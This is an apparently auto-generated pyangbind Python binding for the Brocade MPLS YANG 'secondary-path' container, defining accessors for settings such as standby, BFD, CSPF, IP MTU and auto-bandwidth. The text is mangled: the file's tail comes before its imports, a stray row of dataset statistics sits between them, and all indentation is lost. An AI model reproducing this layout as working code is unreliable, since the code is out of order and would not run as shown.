self.__lsp_include_all = YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-include-all", rest_name="include-all", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Include all of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'include-all'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_secpath_soft_preemption(self):
"""
Getter method for secpath_soft_preemption, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/secpath_soft_preemption (empty)
"""
return self.__secpath_soft_preemption
def _set_secpath_soft_preemption(self, v, load=False):
"""
Setter method for secpath_soft_preemption, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/secpath_soft_preemption (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_secpath_soft_preemption is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_secpath_soft_preemption() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="secpath-soft-preemption", rest_name="soft-preemption", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Set LSP soft preemption capability', u'cli-full-no': None, u'alt-name': u'soft-preemption'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """secpath_soft_preemption must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-soft-preemption", rest_name="soft-preemption", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Set LSP soft preemption capability', u'cli-full-no': None, u'alt-name': u'soft-preemption'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)""",
})
self.__secpath_soft_preemption = t
if hasattr(self, '_set'):
self._set()
def _unset_secpath_soft_preemption(self):
self.__secpath_soft_preemption = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-soft-preemption", rest_name="soft-preemption", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Set LSP soft preemption capability', u'cli-full-no': None, u'alt-name': u'soft-preemption'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
def _get_lsp_secpath_auto_bandwidth(self):
"""
Getter method for lsp_secpath_auto_bandwidth, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_secpath_auto_bandwidth (container)
"""
return self.__lsp_secpath_auto_bandwidth
def _set_lsp_secpath_auto_bandwidth(self, v, load=False):
"""
Setter method for lsp_secpath_auto_bandwidth, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_secpath_auto_bandwidth (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_secpath_auto_bandwidth is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_secpath_auto_bandwidth() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=lsp_secpath_auto_bandwidth.lsp_secpath_auto_bandwidth, is_container='container', presence=True, yang_name="lsp-secpath-auto-bandwidth", rest_name="autobw", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable Auto-bandwidth on secondary path', u'cli-full-no': None, u'callpoint': u'MplsLspSecPathAutoBandwidth', u'cli-full-command': None, u'cli-add-mode': None, u'alt-name': u'autobw', u'cli-mode-name': u'config-router-mpls-lsp-$(../../lsp-name)-secpath-$(../secpath-name)-autobw'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_secpath_auto_bandwidth must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=lsp_secpath_auto_bandwidth.lsp_secpath_auto_bandwidth, is_container='container', presence=True, yang_name="lsp-secpath-auto-bandwidth", rest_name="autobw", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable Auto-bandwidth on secondary path', u'cli-full-no': None, u'callpoint': u'MplsLspSecPathAutoBandwidth', u'cli-full-command': None, u'cli-add-mode': None, u'alt-name': u'autobw', u'cli-mode-name': u'config-router-mpls-lsp-$(../../lsp-name)-secpath-$(../secpath-name)-autobw'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)""",
})
self.__lsp_secpath_auto_bandwidth = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_secpath_auto_bandwidth(self):
self.__lsp_secpath_auto_bandwidth = YANGDynClass(base=lsp_secpath_auto_bandwidth.lsp_secpath_auto_bandwidth, is_container='container', presence=True, yang_name="lsp-secpath-auto-bandwidth", rest_name="autobw", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable Auto-bandwidth on secondary path', u'cli-full-no': None, u'callpoint': u'MplsLspSecPathAutoBandwidth', u'cli-full-command': None, u'cli-add-mode': None, u'alt-name': u'autobw', u'cli-mode-name': u'config-router-mpls-lsp-$(../../lsp-name)-secpath-$(../secpath-name)-autobw'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
secpath_name = __builtin__.property(_get_secpath_name, _set_secpath_name)
secpath_standby = __builtin__.property(_get_secpath_standby, _set_secpath_standby)
secpath_bfd = __builtin__.property(_get_secpath_bfd, _set_secpath_bfd)
secpath_cspf = __builtin__.property(_get_secpath_cspf, _set_secpath_cspf)
secpath_ipmtu = __builtin__.property(_get_secpath_ipmtu, _set_secpath_ipmtu)
lsp_adaptive = __builtin__.property(_get_lsp_adaptive, _set_lsp_adaptive)
lsp_reoptimize_timer = __builtin__.property(_get_lsp_reoptimize_timer, _set_lsp_reoptimize_timer)
lsp_commit = __builtin__.property(_get_lsp_commit, _set_lsp_commit)
lsp_record = __builtin__.property(_get_lsp_record, _set_lsp_record)
lsp_cos = __builtin__.property(_get_lsp_cos, _set_lsp_cos)
lsp_hop_limit = __builtin__.property(_get_lsp_hop_limit, _set_lsp_hop_limit)
lsp_cspf_computation_mode = __builtin__.property(_get_lsp_cspf_computation_mode, _set_lsp_cspf_computation_mode)
lsp_traffic_engineering = __builtin__.property(_get_lsp_traffic_engineering, _set_lsp_traffic_engineering)
priority = __builtin__.property(_get_priority, _set_priority)
lsp_exclude_any = __builtin__.property(_get_lsp_exclude_any, _set_lsp_exclude_any)
lsp_include_any = __builtin__.property(_get_lsp_include_any, _set_lsp_include_any)
lsp_include_all = __builtin__.property(_get_lsp_include_all, _set_lsp_include_all)
secpath_soft_preemption = __builtin__.property(_get_secpath_soft_preemption, _set_secpath_soft_preemption)
lsp_secpath_auto_bandwidth = __builtin__.property(_get_lsp_secpath_auto_bandwidth, _set_lsp_secpath_auto_bandwidth)
_pyangbind_elements = {'secpath_name': secpath_name, 'secpath_standby': secpath_standby, 'secpath_bfd': secpath_bfd, 'secpath_cspf': secpath_cspf, 'secpath_ipmtu': secpath_ipmtu, 'lsp_adaptive': lsp_adaptive, 'lsp_reoptimize_timer': lsp_reoptimize_timer, 'lsp_commit': lsp_commit, 'lsp_record': lsp_record, 'lsp_cos': lsp_cos, 'lsp_hop_limit': lsp_hop_limit, 'lsp_cspf_computation_mode': lsp_cspf_computation_mode, 'lsp_traffic_engineering': lsp_traffic_engineering, 'priority': priority, 'lsp_exclude_any': lsp_exclude_any, 'lsp_include_any': lsp_include_any, 'lsp_include_all': lsp_include_all, 'secpath_soft_preemption': secpath_soft_preemption, 'lsp_secpath_auto_bandwidth': lsp_secpath_auto_bandwidth, }
| 94.914586
| 756
| 0.734944
|
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import lsp_traffic_engineering
import priority
import lsp_secpath_auto_bandwidth
class secondary_path(PybindBase):
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__secpath_name','__secpath_standby','__secpath_bfd','__secpath_cspf','__secpath_ipmtu','__lsp_adaptive','__lsp_reoptimize_timer','__lsp_commit','__lsp_record','__lsp_cos','__lsp_hop_limit','__lsp_cspf_computation_mode','__lsp_traffic_engineering','__priority','__lsp_exclude_any','__lsp_include_any','__lsp_include_all','__secpath_soft_preemption','__lsp_secpath_auto_bandwidth',)
_yang_name = 'secondary-path'
_rest_name = 'secondary-path'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__priority = YANGDynClass(base=priority.priority, is_container='container', presence=False, yang_name="priority", rest_name="priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'LSP setup and holding priority levels', u'cli-sequence-commands': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
self.__secpath_standby = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-standby", rest_name="standby", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Make secondary-path hot standby', u'alt-name': u'standby'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
self.__lsp_secpath_auto_bandwidth = YANGDynClass(base=lsp_secpath_auto_bandwidth.lsp_secpath_auto_bandwidth, is_container='container', presence=True, yang_name="lsp-secpath-auto-bandwidth", rest_name="autobw", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable Auto-bandwidth on secondary path', u'cli-full-no': None, u'callpoint': u'MplsLspSecPathAutoBandwidth', u'cli-full-command': None, u'cli-add-mode': None, u'alt-name': u'autobw', u'cli-mode-name': u'config-router-mpls-lsp-$(../../lsp-name)-secpath-$(../secpath-name)-autobw'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
self.__lsp_cos = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..7']}), is_leaf=True, yang_name="lsp-cos", rest_name="cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure class of service', u'cli-full-no': None, u'alt-name': u'cos'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__lsp_include_all = YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-include-all", rest_name="include-all", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Include all of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'include-all'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__lsp_hop_limit = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), restriction_dict={'range': [u'0..255']}), is_leaf=True, yang_name="lsp-hop-limit", rest_name="hop-limit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Limit of hops the LSP can traverse', u'cli-full-no': None, u'alt-name': u'hop-limit'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)
self.__lsp_cspf_computation_mode = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'use-igp-metric': {'value': 1}, u'use-te-metric': {'value': 2}},), is_leaf=True, yang_name="lsp-cspf-computation-mode", rest_name="cspf-computation-mode", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Specify cspf-computation-mode', u'cli-full-no': None, u'alt-name': u'cspf-computation-mode'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='cspf-computation-mode', is_config=True)
self.__lsp_reoptimize_timer = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'300..65535']}), is_leaf=True, yang_name="lsp-reoptimize-timer", rest_name="reoptimize-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure Reoptimization timer', u'cli-full-no': None, u'alt-name': u'reoptimize-timer'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__secpath_ipmtu = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'576..1526']}), is_leaf=True, yang_name="secpath-ipmtu", rest_name="ipmtu", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IP Packet Maximum Transmission Unit', u'cli-full-no': None, u'alt-name': u'ipmtu'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__lsp_traffic_engineering = YANGDynClass(base=lsp_traffic_engineering.lsp_traffic_engineering, is_container='container', presence=False, yang_name="lsp-traffic-engineering", rest_name="traffic-engineering", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'info': u'LSP traffic engineering parameters', u'alt-name': u'traffic-engineering', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
self.__lsp_commit = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-commit", rest_name="commit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Commit the changes to adaptive LSP', u'alt-name': u'commit', u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
self.__secpath_soft_preemption = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-soft-preemption", rest_name="soft-preemption", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Set LSP soft preemption capability', u'cli-full-no': None, u'alt-name': u'soft-preemption'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
self.__lsp_include_any = YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-include-any", rest_name="include-any", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Include any of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'include-any'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__secpath_bfd = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-bfd", rest_name="bfd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable bfd for secondary-path', u'hidden': u'full', u'alt-name': u'bfd'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
self.__secpath_cspf = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'enable': {'value': 1}, u'disable': {'value': 0}},), is_leaf=True, yang_name="secpath-cspf", rest_name="cspf", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Enable/Disable cspf', u'cli-full-no': None, u'alt-name': u'cspf'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='enable-disable', is_config=True)
self.__lsp_exclude_any = YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-exclude-any", rest_name="exclude-any", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Exclude any of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'exclude-any'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__secpath_name = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..64']}), is_leaf=True, yang_name="secpath-name", rest_name="secpath-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set secondary explicit path'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__lsp_record = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'enable': {'value': 1}, u'disable': {'value': 0}},), is_leaf=True, yang_name="lsp-record", rest_name="record", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Enable/disable recording path routes', u'cli-full-no': None, u'alt-name': u'record'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='enable-disable', is_config=True)
self.__lsp_adaptive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-adaptive", rest_name="adaptive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure LSP/secpath to be adaptive', u'cli-full-no': None, u'alt-name': u'adaptive'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'mpls-config', u'router', u'mpls', u'mpls-cmds-holder', u'lsp', u'secondary-path']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'router', u'mpls', u'lsp', u'secondary-path']
def _get_secpath_name(self):
return self.__secpath_name
def _set_secpath_name(self, v, load=False):
parent = getattr(self, "_parent", None)
if parent is not None and load is False:
raise AttributeError("Cannot set keys directly when" +
" within an instantiated list")
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..64']}), is_leaf=True, yang_name="secpath-name", rest_name="secpath-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set secondary explicit path'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """secpath_name must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..64']}), is_leaf=True, yang_name="secpath-name", rest_name="secpath-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set secondary explicit path'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__secpath_name = t
if hasattr(self, '_set'):
self._set()
def _unset_secpath_name(self):
self.__secpath_name = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..64']}), is_leaf=True, yang_name="secpath-name", rest_name="secpath-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set secondary explicit path'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_secpath_standby(self):
return self.__secpath_standby
def _set_secpath_standby(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="secpath-standby", rest_name="standby", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Make secondary-path hot standby', u'alt-name': u'standby'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """secpath_standby must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-standby", rest_name="standby", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Make secondary-path hot standby', u'alt-name': u'standby'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)""",
})
self.__secpath_standby = t
if hasattr(self, '_set'):
self._set()
def _unset_secpath_standby(self):
self.__secpath_standby = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-standby", rest_name="standby", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Make secondary-path hot standby', u'alt-name': u'standby'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
def _get_secpath_bfd(self):
return self.__secpath_bfd
def _set_secpath_bfd(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="secpath-bfd", rest_name="bfd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable bfd for secondary-path', u'hidden': u'full', u'alt-name': u'bfd'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """secpath_bfd must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-bfd", rest_name="bfd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable bfd for secondary-path', u'hidden': u'full', u'alt-name': u'bfd'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)""",
})
self.__secpath_bfd = t
if hasattr(self, '_set'):
self._set()
def _unset_secpath_bfd(self):
self.__secpath_bfd = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-bfd", rest_name="bfd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable bfd for secondary-path', u'hidden': u'full', u'alt-name': u'bfd'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
def _get_secpath_cspf(self):
return self.__secpath_cspf
def _set_secpath_cspf(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'enable': {'value': 1}, u'disable': {'value': 0}},), is_leaf=True, yang_name="secpath-cspf", rest_name="cspf", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Enable/Disable cspf', u'cli-full-no': None, u'alt-name': u'cspf'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='enable-disable', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """secpath_cspf must be of a type compatible with enable-disable""",
'defined-type': "brocade-mpls:enable-disable",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'enable': {'value': 1}, u'disable': {'value': 0}},), is_leaf=True, yang_name="secpath-cspf", rest_name="cspf", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Enable/Disable cspf', u'cli-full-no': None, u'alt-name': u'cspf'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='enable-disable', is_config=True)""",
})
self.__secpath_cspf = t
if hasattr(self, '_set'):
self._set()
def _unset_secpath_cspf(self):
self.__secpath_cspf = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'enable': {'value': 1}, u'disable': {'value': 0}},), is_leaf=True, yang_name="secpath-cspf", rest_name="cspf", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Enable/Disable cspf', u'cli-full-no': None, u'alt-name': u'cspf'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='enable-disable', is_config=True)
def _get_secpath_ipmtu(self):
return self.__secpath_ipmtu
def _set_secpath_ipmtu(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'576..1526']}), is_leaf=True, yang_name="secpath-ipmtu", rest_name="ipmtu", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IP Packet Maximum Transmission Unit', u'cli-full-no': None, u'alt-name': u'ipmtu'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """secpath_ipmtu must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'576..1526']}), is_leaf=True, yang_name="secpath-ipmtu", rest_name="ipmtu", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IP Packet Maximum Transmission Unit', u'cli-full-no': None, u'alt-name': u'ipmtu'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__secpath_ipmtu = t
if hasattr(self, '_set'):
self._set()
def _unset_secpath_ipmtu(self):
self.__secpath_ipmtu = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'576..1526']}), is_leaf=True, yang_name="secpath-ipmtu", rest_name="ipmtu", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IP Packet Maximum Transmission Unit', u'cli-full-no': None, u'alt-name': u'ipmtu'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
